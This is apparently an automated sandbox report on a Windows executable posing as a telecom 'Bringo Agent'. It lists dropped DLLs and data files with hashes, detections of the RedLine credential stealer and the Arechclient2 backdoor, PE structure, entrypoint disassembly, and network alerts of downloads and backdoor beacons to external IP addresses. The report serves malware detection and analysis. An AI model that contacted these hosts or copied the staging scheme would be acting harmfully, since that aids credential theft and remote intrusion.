                                                                                                                                                                                                      SSDEEP:12288:vlPcUdmdXsyWvjwEzwIhJ7mnBdZhXQX8OzepFPP:Nry6cM+n/QsdP
                                                                                                                                                                                                      MD5:D174EE2651F8440F474C4001237BBCB9
                                                                                                                                                                                                      SHA1:6FB714CE75AA9365CBB12C7BED02D55CB95AE80E
                                                                                                                                                                                                      SHA-256:65C598EED6A29CF700E4FC5C4885DB8616F86AB40AF6EA00A7B7DEC9EAFD9B43
                                                                                                                                                                                                      SHA-512:6D70BD4AADC2C7EBE8D3D4702BD2B9CA79AE5E4B3938F58FB75888CC921332921BD5C919998D7874FC99839CC8F2C4373C6450A22DF57C1AF2032CAD3AE5C35E
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\vpdcuvm, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\vpdcuvm, Author: Joe Security
                                                                                                                                                                                                      • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\vpdcuvm, Author: ditekSHen
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=.b............................^.... ........@.. .......................@..................................................K............................ ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................@.......H.......,....>...........................................................0............ ....X...%-.&so...sp...}-..... ....X.~(.... ....Y.).... .....7...%.....~'.... ....Y.)....sq...~(.... ....Y.)....or.........%.~s.... ....X .... "...a~s.....dX(.....%.~(.... ....Y.)......~(.... ....Y.)....~0...%-.&~/.........st...%.0...(...+}....*..0........... ....X..{M...*..0............(..... .p..Y. ...@\...\a..Z3.+.~s.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~s.... ...X..#.......@.

                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\DH_Http\ISCmplr.dll

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe
                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1690584
                                                                                                                                                                                                      Entropy (8bit):6.336274537980391
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24576:YrZFiXfVsiJj3+67PH7clbvwqumjji1GkjE/I:YHitsQuLwqu4jrkjEA
                                                                                                                                                                                                      MD5:9265F82E182C2452C2B4288DEA60C119
                                                                                                                                                                                                      SHA1:73D9060D5DFD48A7A0DE32589C2F53A9D12EC11A
                                                                                                                                                                                                      SHA-256:F01AEA0BF0DEB6EC641D057F2D17F3F0B095194DC18662089BAA6C19B4D5FC6B
                                                                                                                                                                                                      SHA-512:6C939080A75043DF18EDCA853C0FD6E375D69E1488544E3255D142A4E75F4DCFDDE4A673768AE6DB3B637D366AC5843E03A86648ECE127A38DF01D7A0F614752
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................f..........X........................................`.......................................p.......@..*....@...................E..........................................................0C.......`.......................text....T.......V.................. ..`.itext..x....p.......Z.............. ..`.data....I.......J...j..............@....bss.....l...............................idata..*....@......................@....didata......`......................@....edata.......p......................@..@.rdata..E...........................@..@.reloc.............................@..B.rsrc........@.......t..............@..@.............`......................@..@........................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\DH_Http\isscint.dll

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe
                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):290592
                                                                                                                                                                                                      Entropy (8bit):6.484525296409455
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6144:iCpoP+TXSmmC5DraI3OF8epVPWsLrmgsyLPAIfvBZ2:iMmzWDWI3OFBNWsLrmgsyL3vG
                                                                                                                                                                                                      MD5:8ED7503A4A911A37B3719050962BCD93
                                                                                                                                                                                                      SHA1:1C8B8D2A8F90C98F2567287197D6A05A0231321D
                                                                                                                                                                                                      SHA-256:7D1C2CC3F4B6A1EEE8EADFFC7991DF534566DFD5E0DAD6E44F2409FF47030A95
                                                                                                                                                                                                      SHA-512:70D8AA132AB20012EE44C5E211BF3B8BB687C97589CEBD3302232395733FF878543877EE1255FA937EB1C7511C54019846AE07921E81B613F12284473E97ACD8
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........U............n........P.......P.......P.....n...........O....P.......P.......P.......P......Rich............PE..L...Np.L...........!.....P..........R........`....`..........................P.......S..................................Y.......x.......x............0.. ?... ...!...c..................................@............`..L............................text...*D.......P.................. ..`.rdata..Ik...`...p...`..............@..@.data....0....... ..................@....rsrc...x...........................@..@.reloc.../... ...0..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\DH_Http\presidio.json

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1257682
                                                                                                                                                                                                      Entropy (8bit):7.9465336841006575
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24576:/sGEIRmQ98WE2Q05LjbL2fVjmx4QQoPuukEkpeNpdbo/V3srVTUwMdWEn:UGEqmQGWv5LjP2JmxlzuukGm2IrkO
                                                                                                                                                                                                      MD5:F6378BFC75D5B4FD21DC8A6D02600DFE
                                                                                                                                                                                                      SHA1:97379C3B86F81CFA4EAAF626C8029FA87BDAEA94
                                                                                                                                                                                                      SHA-256:B524914A58727FD5D59344947E638F0A692532D3B78B4F353BE87F04F934C1CA
                                                                                                                                                                                                      SHA-512:EE1AA8AF560CFBB7630C973DD7A9EE7AABC06646D26E151CF1692DBFA6567672C923E133AE0C244F767DCB3C1206E599C2CF9BB80F8BE416D03880D1DA2E7AEE
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.kZ......v..Jbj.\..t.A..g.p.O.E.Y^].fe.nVX..A.Po.sI....ME.....ohpPb..\.Zr.WZ.bGV.K..Y..RE.^PPw..lfJA..T]._pn^......^..`j.....u..g..Vx....qB..ISY...E.BV...AmPVAauQS.......W`M.OFl.E\.mB.rQ.]C....am...NL..CrG..q.G..bS.P...sJN.D.t.P..s..i._Lw.\d_e.n..y...X.Z....F.y.w.mV]...SR...g....\..C..pmDdj`......R.eD.X..j.H...].E..cBqx^...DP.p..p.Pr......I_....wp.U.BPuk..u..y.K.R..ESovb.w\SYC[..x.uCG..U._...aPB..BMj.GLLXa.vYCx..o.L..IaI.a.U_r...Ul..[.x..`W..t.T[.lqg....p.mf...CqwY..oF\kE.j..SmxehwoRUv.....b.n..j...._J...pJ.am.X.qvMD..RaOrH.sLMNT_....R.ZuR[...AmPg.Gb..w.]Wh...Lkyx..SQ]..K.P.Y.e.a......[....i[k.c.T.AJj..^.cHy.GEtGU..Ms.gy..].b..K.I.j..s..w.ZPTj...O.]iWE.xD...k_vgmhMP...kFNUJX..S..t..S.e_.ZVdauA..A...._..M..S..SB.gtMB]OOMD...r.a..qG.U.C...c.K....KD...f....KSp.Q.Pr..c`..p.wl.l.Ip.wSeHpZP^...yJ.Q..V.....L..mxNQ.......Y].C.e...Kv.....MN.Y.N..L]........I`ODXa..T..np.S..d`smjl...eKO..U.._kdNt.o..s..YrE...s.._...wP.N.Z..S....j.W..SPu.A.NTbQ.uFlY.evC...s...u..Lv^w.......B..._Zismd......j..ui...

                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\DH_Http\tributary.iso

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):55355
                                                                                                                                                                                                      Entropy (8bit):4.637572809847945
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:+hQnYE49jnlqN6cs/FPQ0s6RzX85yhmVrPWZtiy6KXuT8M1PUxQU/+NaXrCfG8Nl:sJBlkVkoc2yhor+XimXm9Ud/Prr/J2
                                                                                                                                                                                                      MD5:7E6C0A41362FC54DCE3F8A531868857C
                                                                                                                                                                                                      SHA1:2588655C688AE3318B819F06B351034331B2122F
                                                                                                                                                                                                      SHA-256:6D1C1A4A407B67AB6763A9F04230F366134CD1456B5CC5FC70E8BD4EFF196B71
                                                                                                                                                                                                      SHA-512:64C3F3FF299EED757879DB2D7EE0E972ADA74B1E5F1D430B5FFCD8D88C1E74B6E073491BCAABAB3B2E05AD258439351351B71D1FB91862F74F89D721B431290E
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:A..f.OF.in..sh.c.]....bWnmQ..OZY....\.Q`....J..l.V..rE....c.q..E..u.^.^.d.wvqC^..jmf^..l....O..V...w.g.u.t.t[w.LW...TmiD...w....B..g..WJ]...SW..ydlo.T.DQw...K.F..oN.nsAa[.g....O.[D......P...Z......h...k..y....f.yoca..j.Y....o..p..^...e...U.t.TT...I......fej.O.rv.Mby.y.k.Ot.i...D.DU..T..EU.K.u..bOJ.F.X.lA.dpiHB.G.x.....`..bk.I..a][..n..b.......iFy.p..k.[mPR.MoH.^.eJ.OT.....B.[.\I.C...P.gRl.[y.idjU.I.Y.POC^.uWS.m.ile.x......U.d....YGbv..s..dD.\...GV.\...i........LW.o....r.P.Z.[...A.c.u......lSf..^fA]x..GvO.....b........oZ.a.SY.....D..ZZ..mI..[...BVSts...BLV..O.....e.OC.Y.Jd.n.s..H..we....t.r.WIO.....LpQNdm..Z.......gO.h.o.H.R.^.Org.s.qT.mf^.L..A...b.V.ZH.Sr.aX.BRE....ey.t.......y.d..L..u.h.sUp.Mb.g..Opadkq.AY...dnT.\a.A..wgIt...Y..Lw.`...V.f.B..Y....Y..P....[X.sjWOl.mJ...s.s..Od.fl..k.`g..uCw....Lv...R...nI..c...C..Q.k.bSDCD...e_XeU..f.X....]..R.P.K..SKh....F...aU.d..Q[........o..S.IEKeXL.F...G....jpgx.cB_v.u.nN.a.....t....s._BK....G...\f..K....[Xvdw...Ic...MR..`._V.Cq.`jaGx..k..u.....[G

                                                                                                                                                                                                      \Device\ConDrv

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\7zip\7za.exe
                                                                                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):572
                                                                                                                                                                                                      Entropy (8bit):5.027002138418463
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:AMpnkOf3otkt7QcAxXF2Saiewkn23fUa7AIeST3wkn23f8dyjAiewkn23f8dyikr:pmOv6WcRwsfrTAfN8YfN9UbFAI0eNl1q
                                                                                                                                                                                                      MD5:E82B17533129C5B9D94E2C7E90E8A24B
                                                                                                                                                                                                      SHA1:7CFF425A0E517D2BC0C813CA5B866109B17163EB
                                                                                                                                                                                                      SHA-256:85D11A5B65124A1BB1D087393EE419FD6D4EAB2453A820BC9D631C5BDA398E6D
                                                                                                                                                                                                      SHA-512:4E2C68C84423D8614675873E0C6295EFB9325DC079CF4A16EA9DAAB6DE165637B88436C7AD2C6388AC6D7D8FE8A4FE524E73D33E11A72DCB3E45D893D30DF1AF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:..7-Zip (a) 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29....Scanning the drive for archives:.. 0M Scan C:\Users\user\AppData\Local\Temp\. .1 file, 3086407 bytes (3015 KiB)....Extracting archive: C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1..--..Path = C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1..Type = zip..Physical Size = 3086407.... 0%. . 95% 3 - presidio.json. .Everything is Ok....Files: 5..Size: 6165981..Compressed: 3086407..

                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                      General

                                                                                                                                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                      Entropy (8bit):6.387724167494902
                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                      File name:zkwindow.exe
                                                                                                                                                                                                      File size:224'256 bytes
                                                                                                                                                                                                      MD5:bd04d8b3cc0b6a257d2f73e726e7cbec
                                                                                                                                                                                                      SHA1:a7d0cf73d777ed4e7b4c2ea074c3d0eb4601a85b
                                                                                                                                                                                                      SHA256:1bf736bd8a06776dcb75a947d027e0ece226c52115a18e1c834bed393d9df53f
                                                                                                                                                                                                      SHA512:98253449697a8695e9a8017e4c382c2c1b3ac37db6ccd9448351593ce497be061fd492846ee39ee13c80654e632bac453760fab54f8d98e924717157313de3ca
                                                                                                                                                                                                      SSDEEP:3072:WaXzMTwSGkofZS3fTwRmJhreMU91LgpHSlTM8Ym9H5qYJD+o:WmgUDfgPfyfD2mJsYg
                                                                                                                                                                                                      TLSH:76244C2A77E988FCF8B691BEC5671F01D3797866072186CF07A015113E1FAD49E3EA60
                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.............B..3....B.......B.......E.......E.......E.......B..............[D......[D......[DD.......,.....[D......Rich...

                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                      Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Entrypoint:0x14000c084
                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                      Time Stamp:0x67CB5B8D [Fri Mar 7 20:48:13 2025 UTC]
                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                      Import Hash:8243df1434e6935a757138723620ba99

                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                                                      call 00007F069CF3C0A4h
                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                      add esp, 28h
                                                                                                                                                                                                      jmp 00007F069CF3B9AFh
                                                                                                                                                                                                      int3
                                                                                                                                                                                                      int3
                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                      sub esp, 48h
                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                      lea ecx, dword ptr [esp+20h]
                                                                                                                                                                                                      call 00007F069CF3B34Fh
                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                      lea edx, dword ptr [00027563h]
                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                      lea ecx, dword ptr [esp+20h]
                                                                                                                                                                                                      call 00007F069CF3D2D6h
                                                                                                                                                                                                      int3
                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                      mov dword ptr [esp+10h], ebx
                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                      mov dword ptr [esp+18h], esi
                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                      push edi
                                                                                                                                                                                                      inc ecx
                                                                                                                                                                                                      push esi
                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                      sub esp, 10h
                                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                                                      cpuid
                                                                                                                                                                                                      inc esp
                                                                                                                                                                                                      mov eax, ecx
                                                                                                                                                                                                      inc esp
                                                                                                                                                                                                      mov edx, edx
                                                                                                                                                                                                      inc ecx
                                                                                                                                                                                                      xor edx, 49656E69h
                                                                                                                                                                                                      inc ecx
                                                                                                                                                                                                      xor eax, 6C65746Eh
                                                                                                                                                                                                      inc esp
                                                                                                                                                                                                      mov ecx, ebx
                                                                                                                                                                                                      inc esp
                                                                                                                                                                                                      mov esi, eax
                                                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                                                      mov eax, 00000001h
                                                                                                                                                                                                      cpuid
                                                                                                                                                                                                      inc ebp
                                                                                                                                                                                                      or edx, eax
                                                                                                                                                                                                      mov dword ptr [ebp-10h], eax
                                                                                                                                                                                                      inc ecx
                                                                                                                                                                                                      xor ecx, 756E6547h
                                                                                                                                                                                                      mov dword ptr [ebp-0Ch], ebx
                                                                                                                                                                                                      inc ebp
                                                                                                                                                                                                      or edx, ecx
                                                                                                                                                                                                      mov dword ptr [ebp-08h], ecx
                                                                                                                                                                                                      mov edi, ecx
                                                                                                                                                                                                      mov dword ptr [ebp-04h], edx
                                                                                                                                                                                                      jne 00007F069CF3BB8Dh
                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                      or dword ptr [00028F85h], FFFFFFFFh
                                                                                                                                                                                                      and eax, 0FFF3FF0h
                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                      mov dword ptr [00028F6Dh], 00008000h
                                                                                                                                                                                                      cmp eax, 000106C0h
                                                                                                                                                                                                      je 00007F069CF3BB5Ah
                                                                                                                                                                                                      cmp eax, 00020660h
                                                                                                                                                                                                      je 00007F069CF3BB53h
                                                                                                                                                                                                      cmp eax, 00020670h
                                                                                                                                                                                                      je 00007F069CF3BB4Ch
                                                                                                                                                                                                      add eax, FFFCF9B0h
                                                                                                                                                                                                      cmp eax, 20h
                                                                                                                                                                                                      jnbe 00007F069CF3BB56h
                                                                                                                                                                                                      dec eax

                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x337f00x4c.rdata
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3383c0x28.rdata
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c0000x510.rsrc
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x380000x20e8.pdata
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x3d0000x7b0.reloc
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x317400x38.rdata
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x316000x140.rdata
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x200000x260.rdata
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                      Sections

                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                      .text0x10000x1e7190x1e800cc48ecf335329746e5802287f5a31de0False0.43736392161885246data6.280821138564314IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                      .rdata0x200000x1403e0x1420043d99fc900b1cd68f15a07dabe7d6a36False0.5703246312111802data5.857565521910381IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                      .data0x350000x2fc40xc00f805c815e0e5aeb20e1fef7b1010db71False0.15169270833333334DOS executable (block device driver)2.1985355773976365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                      .pdata0x380000x20e80x22007c33bc6377526dc13e48e423027aac69False0.42130055147058826data4.983288937913722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                      .fptable0x3b0000x1000x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                      .rsrc0x3c0000x5100x60049c80db29594345290aa7c6f129ac684False0.3997395833333333data3.7195063857513566IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                      .reloc0x3d0000x7b00x800122b1cf83f311cc87820330f602a165bFalse0.58935546875data5.369829628145261IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                      Resources

                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                      RT_VERSION0x3c0a00x2f0SysEx File - IDPRussianRussia0.45611702127659576
                                                                                                                                                                                                      RT_MANIFEST0x3c3900x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                      Imports

                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                      KERNEL32.dllCreateMutexA, GetLastError, LoadLibraryA, GetProcAddress, ExitProcess, FreeLibrary, WriteConsoleW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, WriteFile, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, InitializeCriticalSectionEx, VirtualProtect, LCMapStringW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetFileType, SetStdHandle, GetStringTypeW, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CreateFileW, CloseHandle

                                                                                                                                                                                                      Exports

                                                                                                                                                                                                      NameOrdinalAddress
                                                                                                                                                                                                      ?exec@@YAXXZ10x140009380

                                                                                                                                                                                                      Version Infos

                                                                                                                                                                                                      DescriptionData
                                                                                                                                                                                                      CompanyNameBringo Telecom
                                                                                                                                                                                                      FileDescriptionBringo Telecom
                                                                                                                                                                                                      FileVersion143.27.12.17
                                                                                                                                                                                                      InternalName
                                                                                                                                                                                                      LegalCopyright 2016 - 2025 Bringo Telecom. All rights reserved.
                                                                                                                                                                                                      OriginalFilename
                                                                                                                                                                                                      ProductNameBringo Agent
                                                                                                                                                                                                      ProductVersion143.27.12.17
                                                                                                                                                                                                      Translation0x0402 0x04b0

                                                                                                                                                                                                      Possible Origin

                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                      RussianRussia
                                                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                      2025-03-10T21:39:49.797987+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449715164.132.58.105443TCP
                                                                                                                                                                                                      2025-03-10T21:39:52.676861+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449717164.132.58.105443TCP
                                                                                                                                                                                                      2025-03-10T21:39:52.676861+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449717164.132.58.105443TCP
                                                                                                                                                                                                      2025-03-10T21:39:56.395602+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449718188.114.97.3443TCP
                                                                                                                                                                                                      2025-03-10T21:40:04.057568+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449724188.114.97.3443TCP
                                                                                                                                                                                                      2025-03-10T21:40:04.057568+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449724188.114.97.3443TCP
                                                                                                                                                                                                      2025-03-10T21:40:44.737773+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44972792.255.85.369000TCP
                                                                                                                                                                                                      2025-03-10T21:40:45.540936+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44972892.255.85.369000TCP
                                                                                                                                                                                                      2025-03-10T21:40:46.347619+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44972992.255.85.369000TCP
                                                                                                                                                                                                      2025-03-10T21:40:47.150924+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44973092.255.85.369000TCP
                                                                                                                                                                                                      2025-03-10T21:40:47.954352+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44973192.255.85.369000TCP
                                                                                                                                                                                                      2025-03-10T21:40:48.764207+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44973292.255.85.369000TCP
                                                                                                                                                                                                      2025-03-10T21:40:49.555415+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44973392.255.85.369000TCP
                                                                                                                                                                                                      2025-03-10T21:40:49.555415+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44973392.255.85.369000TCP
                                                                                                                                                                                                      2025-03-10T21:40:50.383096+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44973492.255.85.369000TCP
                                                                                                                                                                                                      2025-03-10T21:40:51.182444+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44973592.255.85.369000TCP
                                                                                                                                                                                                      2025-03-10T21:40:51.182444+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44973592.255.85.369000TCP
                                                                                                                                                                                                      2025-03-10T21:40:52.055743+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44973692.255.85.369000TCP
                                                                                                                                                                                                      2025-03-10T21:40:52.856218+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44973792.255.85.369000TCP
                                                                                                                                                                                                      2025-03-10T21:40:52.856218+01002052248ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)1192.168.2.44973792.255.85.369000TCP
